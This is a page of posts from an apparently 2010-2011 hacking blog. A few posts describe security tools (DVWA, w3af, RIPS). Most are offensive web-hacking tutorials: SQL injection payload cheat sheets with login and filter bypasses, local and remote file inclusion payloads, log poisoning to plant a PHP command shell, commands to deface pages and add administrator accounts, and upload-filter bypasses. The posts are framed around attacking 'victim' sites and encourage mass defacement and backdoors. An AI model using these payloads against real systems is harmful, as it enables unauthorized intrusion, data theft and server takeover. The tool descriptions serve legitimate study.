Showing posts with label file inclusion. Show all posts
Showing posts with label file inclusion. Show all posts

Thursday 21 April 2011

Practise, Learn and Master Web Application Hacking With DVWA

DVWA, which stands for Damn Vulnerable Web Application, is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.


The DVWA v. 1.07 can be downloaded from HERE.

You will need to install Apache+PHP+MySQL environment(use LAMPP or XAMPP packages) to run and test this web application. This will definitely help you learn to spot web vulnerabilities of the varied levels. I hope this was useful. :)

Read more...

Thursday 14 April 2011

Web Application Attacking and Auditing with W3af Framework.

w3af is a Web Application Attack and Audit Framework. The project's goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend.

W3af is the tool written totally in Python and supports many techniques for detecting and exploiting the web based vulnerabilities.
Framework features

w3af provides plugin writers with this features:
urllib2 wrapper
In order to send requests to the remote server w3af uses urllib2. The xUrllib module of w3af is a wrapper of urllib2 to make the plugin writer life easier, using this wrapper a plugin writer can forget about proxy's, proxy auth, basic/digest auth, etc. This is the complete list of features provided by xUrllib:

- Proxy
- Proxy auth ( basic and digest )
- Site auth ( basic and digest )
- Gracefully handle timeouts
- UserAgent faking
- Add custom headers to requests
- Cookie handling
- Local cache for GET and HEAD requests
- Local dns cache, this will speed up scannings. Only one request is made to the DNS server
- Keep-alive support fot http and https connections
- File upload using multipart POST requests
- SSL certificate support

Output Management
w3af provides plugin writers with an abstraction layer for data output using the Output Manager. The output manager can also be extended using plugins and can be used for writing results to a txt/html file or sending them over the network using scp, the options are endless. Available ouput plugins are:
- Console
- Text file

Web Service support
w3af knows how to parse WSDL files, and audit webservices. Plugin developers can write a simple plugin that will be able to find bugs in web services and also in common HTTP applications.

HTTP headers fuzzing
w3af supports finding bugs in HTTP headers with great ease!

IPC
IPC ( inter plugin communication :P) can easily be done using the knowledge base, another w3af feature thats really usefull for plugin developers.

Session saving
Framework parameters can be saved to a file using the sessionManager. After that, you can load the settings and start the same scan again without configuring all parameters.

Fuzzer
Right now w3af has a really simple fuzzer, but we have plans to extend it. Fuzzers are great, we know it.

HTML / WML parsing
w3af provides HTML / WML parsing features that are really easy to use.

To install w3af under your ubuntu, type the following in the terminal.

sudo apt-get install w3af


Visit w3af homepage



Read more...

Sunday 26 December 2010

Web Hacking for Beginners and Intermediates

This is the article I posted on the secworm contest and I am now posting this in my blog. Its not that well written due to the lack of time but still will help some of you out there.

Hi all, I am Deadly Ghos7 aka sam207 and this is my article as the entry for the secworm contest #1. First, I would like to apologize for any kind of grammar mistakes in this article as there would be surely lots of grammatical errors in this article.

This article is not an article about teaching the basics of any web hacking techniques. Instead, it is the document of tips and tricks that the beginners and intermediates can make use of in order to attack the web applications on certain scenarios. I assume that you know the basics of the web hacking techniques or you could google for learning the basics. I'll be covering the tricks on different web hacking methods such as SQL injection(MySQL basically), insecure file inclusions, insecure file upload, etc. As already stated, the article won't be about basic but rather would present you few useful tricks that might be useful in the course of web-app pentesting.

SQL Injection:
Comments: - - , /* , #
MySQL version: SELECT @@version

Current SQL User: SELECT user()
SELECT system_user()

Current Database: SELECT database()

MySQL Data directory(location of MySQL data files): SELECT @@datadir

List all MySQL users: SELECT host, user, password FROM mysql.user

Bypass Quotes: SELECT pass FROM users WHERE user=0x2773616d32303727 --hex
SELECT pass FROM users WHERE user=char

Load local file: SELECT LOAD_FILE('/etc/passwd') --We can use quote bypassing here.

Create File with SQLi: SELECT * FROM table INTO dumpfile '/tmp/dump'
SELECT password FROM user INTO OUTFILE '/home/samar/www/dump.txt'
quote bypassing seems not working here. The path can't be encoded using the quote or char so we can't bypass the quote in this case.

Using limit: union all select null,table_name,null from information_schema.tables LIMIT 20,1
(useful when only one column is seen while doing SQLi)

unhex(hex()): union all select 1,concat(unhex(hex(username,0x3a,password))) from tblusers--

Bypassing filters:
uNiOn aLl SeLeCT 1,2 FrOm tbluser
/*!union*/ all select 1,2 from tbluser
union(select(null),table_name(from)(information_schema.tables)) --Bypassing the whitespace filter
0%a0union%a0select%091

XSS with SQLi (SIXSS): union all select 1,<script>alert(123)</script>

Login bypass:
'=' in both username and password field
' or 1='1'--
' or 1='1'/*
' or 1='1'#
' or 1='1';
In the username field and random password, it would bypass the vulnerable authentication login.

' /*or*/ 1='1 –Bypasses or filter


File Inclusion:
-> A sample vulnerable piece of code would be something like below: test.php


including file in the same directory
test.php?page=.htaccess
test.php?page=.htpasswd

path traversal to include files in other directories
test.php?page=../../../../../../../../../etc/passwd

Nullbyte injection
test.php?page=../../../../../etc/passwd

Directory listing with nullbyte injection only for FreeBSD (afaik) and magic quotes off
test.php?page=../../../../home/

PHP stream/wrappers inclusion
test.php?page=php://filter/convert.base64-encode/resource=config.php

Path Truncation inclusion
test.php?page=../../../../../../etc/passwd.\.\.\.\.\.\.\.\.\.\.\ …
With more details on this, http://www.ush.it/2009/02/08/php-filesystem-attack-vectors/
Apache Log injection
test.php?page=../logs/access.log
You'll have to find the location of the log in order to include it. Also you should try including everything you can such as the session files, uploaded files, etc. For the apache log injection, you'll have to telnet and send the GET request for arbitrary PHP code like Get / Few apache log locations to try are as below:

Useragent
test.php?page=../../../../../../../proc/self/environ
Set your useragent to some php code and it will get executed if you are able to include the /proc/self/environ file.

Check existence of folder:
test.php?page=../../../../../folder/you/guess/../../../../../etc/passwd
Here the trick is basically using the path traversal method.

File upload:
Nullbyte injection: If only valid extensions(such as jpg, gif) are allowed, we can rename our shell to shell.php.jpg which will bypass the file upload security check.

PHP code within image: Sometimes the uploads are not checked for the file extension but for dimensions of images. This again can be bypassed by injecting PHP codes in the valid images and renaming them to .php file. The tool named edjpgcom can be used in order to inject the PHP code as JPEG comments in the images.

Header bypass: Again sometimes the developer just relies on the header information that contains the type of the file like “image/jpeg” for jpeg image. But since this is passed from client side, it can be modified using the tools such as tamper data or live http headers.

Also, the file upload feature can be exploited in union with the file inclusion vulnerability. If you have a site vulnerable to the file inclusion but not vulnerable to the insecure file upload, you can upload valid image as said in second method here and then you can include that file with the file inclusion vulnerable PHP script.

As said earlier, this article is not about giving you every steps of how to exploit the web vulnerabilities.



Read more...

Friday 10 December 2010

RIPS - PHP Static Source Code Analyzer

RIPS is a static source code analyser for vulnerabilities in PHP webapplications. It was released during the Month of PHP Security (www.php-security.org).

In this submission a tool named RIPS is introduced which automates the process of identifying potential security flaws in PHP source code by using static source code analysis. RIPS is open source and freely available at http://www.sourceforge.net/projects/rips-scanner/. The result of the analysis can easily be reviewed by the penetration tester in its context without reviewing the whole source code again. Given the limitations of static source code analysis, a vulnerability needs to be confirmed by the code reviewer.

Read more...

Friday 19 November 2010

Variations for exploiting the File Inclusion vulnerability

This post lists some of the ways that I've learnt to exploit the file inclusion vulnerability. I'm quite sure that there are much more variations and modifications to exploit file inclusion so if you have any, feel free to comment here.

Before going on this post, you might want to read my previous articles posted here before:
LFI tutorial
RFI tutorial
-> A sample vulnerable piece of code would be something like below: test.php
<?php
include("incs/".$_GET['page']);
?>

-> including file in the same directory
test.php?page=.htaccess
test.php?page=.htpasswd

-> path traversal to include files in other directories
test.php?page=../../../../../../../../../etc/passwd

-> Nullbyte injection
test.php?page=../../../../../etc/passwd

-> Directory listing with nullbyte injection only for FreeBSD (afaik) and magic quotes off
test.php?page=../../../../home/

-> PHP stream/wrappers inclusion
test.php?page=php://filter/convert.base64-encode/resource=config.php

-> Path Truncation inclusion
test.php?page=../../../../../../etc/passwd.\.\.\.\.\.\.\.\.\.\.\ …

I'll update it more and more when I get to know other variations on exploiting the file inclusion vulnerabilities.

Read more...

Thursday 7 October 2010

Local File Inclusion [LFI] tutorial for beginners

Before, I have written an article on remote file inclusion (RFI) and this time, I am writing the article of LFI. So what is LFI? Its similar to RFI except that we are gonna include the file within the server rather than from another server. Sometimes, what happens is, we have allow_url_include setting is set to off on the webserver (On is by default) or there's somekind of filtration to check for things like http:// or www (though we can bypass these things). So in that condition, we may have to use LFI to own the server.

So lets again take example of vulnerable script:

<?php
    if (IsSet($_GET['page']))
        include($_GET['page']);
?>

Here we can see that the script doesn't check for which file to be included and hence, we are free to include any file by changing the 'page' GET variable value.

    Eg: www.victim.com/index.php?page=profile.php
   
Lets put a quote at the end of URL and we see a pretty nice error like this:

Warning: include(profile.php) [function.include]: failed to open stream: No such file or directory in C:\wamp\www\test.php on line 2

Warning: include() [function.include]: Failed opening 'profile.php' for inclusion (include_path='.;C:\php5\pear') in C:\wamp\www\test.php on line 3

So the script can't find the file profile.php' and hence errors. Now, lets try to include sensitive files that might be present in the webserver.

    Eg: www.victim.com/index.php?page=../../boot.ini    //boot.ini file in windoze
        http://localhost/test.php?page=../../windows/system32/drivers/etc/hosts        //hosts info file
        http://localhost/test.php?page=../../../../etc/passwd            //on Linux
        http://localhost/test.php?page=../../windows/repair/sam            //backup sam file
       
        etc. and etc.

   
    Two ../ shifts the current directory to two level down like cd../.. in command prompt. You may watch the error to find how many such dots you should use. But if you don't know how many such ../ you should use or don't want to waste time on finding how many steps you require, you may put enough such trails like about 10 to view these files like boot.ini or /etc/passwd as after reaching to the root folder like C:\, they can't go down anymore.

So you now know how to include sensitive files on the webserver. Now what if we need shell on the server.
Now, we throw some error to the logs of webserver that contain PHP code:
    <?php passthru($_GET['cmd']); ?> or something similar to this. There are functions like system(), shell_exec(), exec(), etc. offered by PHP for executing system level commands.

The problem on injecting malicious code to log files is that we either need to inject through telnet or using codes. I have seen many sites with the perl codes for the purpose. Search it.
What we do is inject the code to log files of apache such as access.log or apache_error.log or php_error.log or on any other log file. Then we include the same log file in the vulnerable script and then execute system commands.
    In my wampserver, I have:

        http://localhost/test.php?page=../logs/access.log   //for the log with site access infos.

There are various places you might want to watch and I'll be listing them at the end of tutorial.
Here I am gonna use telnet to throw the PHP code as error to the access.log file.

    telnet localhost 80
    GET /<? passthru($_GET['cmd']); ?> HTTP/1.1
   

Now this is gonna get saved in the file access.log in my webserver and now I include it in the vulnerable script:

    So we do:    http://localhost/test.php?page=../logs/access.log&cmd=dir    //lists the directory
    Now you may do any miserable works by writing cmd=any_system_level_commands like:
        ls -lia
        echo "HaCKeD BY sam207">index.*
        net user sam207 mypass /add
        net localgroup administrator sam207 /add
       
       

and any other commands you like.
This describes pretty much on owning the server. Now something extras I thought to include here:
    Some developers think that they can ensure the inclusion of only valid php file by doing something like below:

        <?php
            if (IsSet($_GET['page']))
                include($_GET['page'].".php");
        ?>

        // so looks like that it will include only the php files by ensuring the .php extension at the end. But if we add question mark (?) or nullbyte () by doing http://localhost/test.php?page=access.log, it would become something like:
                include("access.log.php");    //now the scripts leaves anything behind the nullbyte and the file access.log is successfully included. And you can carry your usual pwnage.
        Note that don't try to inject PHP code by sending malicious HTTP requests through your browser. It will be encoded and you won't be able to exploit.

Now finally the places you might want to watch on lfi:
    etc/passwd
    etc/group
    etc/security/passwd
    etc/security/group
    apache/logs/access.log
    apache/logs/error.log
    var/log/access.log
    etc.
You can find many other places to look after during your lfi by searching on the internet. Be creative and use your brain.
Hope you like it. Please comment it.
With Regards~
sam207

Read more...

Sunday 29 August 2010

Basic on Remote File Inclusion[RFI]

This time, I am going to give you information about the remote file inclusion vulnerability in the webpages which can be compromised to root and mass the server.
First, let me say what remote file inclusion(RFI) is... File inclusion vulnerability is the result of poor & insecure programming practice which allows us to include the files in the website's php scripts. Now, whenever I say remote file inclusion, the file that is going to be included is from different server. Simple, you would include some evil file with malicious code from another server in the victim site you are hacking. Such evil file is called shell and should be in .txt format so as to get executed in the victim site. There are numerous shells available on the internet. Google for r57 or c99 shell and you should get the shells. Now you need to upload these shells to the server(free hosting providers) with .txt extension.


Let me suppose, I am browsing a site www.victim.com & notice in the URL(in address bar) that one of the GET arguments is index.php?page=home.php. I click on the link & it changes to index.php?page=game.php

    Example:

        http://www.victim.com/index.php?page=home.php
        http://www.victim.com/index.php?page=game.php

Let me show you the code for index.php that makes it vulnerable to RFI.


    <?php
     $mypage=$_GET['page'];
     include($mypage);
    ?>

So, the code sets $mypage to $_GET['page'] & whenever we go to http://www.victim.com/index.php?page=game.php, game.php file is included by include() function i.e. the content of blog.php is pasted into index.php
But this allows malicious attacker to include remote files also. I mean, if you put:

    http://www.victim.com/index.php?page=http://www.yoursite.com

 you will see the content of your site on the site.

Now you got the idea of remote file inclusion, its time to exploit it. So we use evil scripts called shells which provide us the interface of viewing, deleting & editing files, getting server info & much more.

Say, I've uploaded my shell in free hosting provider & the URL(location) of my shell is http://www.hacky0u.free.com/lol.txt, I would do:


    http://www.victim.com/index.php?page=http://www.hacky0u.free.com/lol.txt

Now, with this I get shell on the server & can do anything from deleting files to stealing the informations from there.
But sometimes, programmers write codes like below:


    <?php
     $mypage=$_GET['page'];
     include($mypage.".php");
    ?>

So if we have index.php?page=game, the game.php file is getting included. So this seems to include only php files & our .txt shell file won't get included instead it would include .txt.php making us fail. But, if we add "?" this gets bypassed & we can still gain shell. Similarly, if ? doesn't work, you can injection nullbyte() in place of ? that denotes end of the string.

    Example: http://www.victim.com/index.php?page=http://www.hacky0u.free.com/lol.txt?

After getting shell, we may delete files, do mass defacements, gain root access using root exploits, keep backdoors, install r00tkits,etc. & etc. Seems elite but you can learn all these things.
Now, something about avoiding RFI... If you are a web programmer, the you should know the switch-case-default statement. Use it for the navigation to the pages instead of above shown scripts. Switch is simple yet the best solution.
Learn it, hack it & enjoy it...

Read more...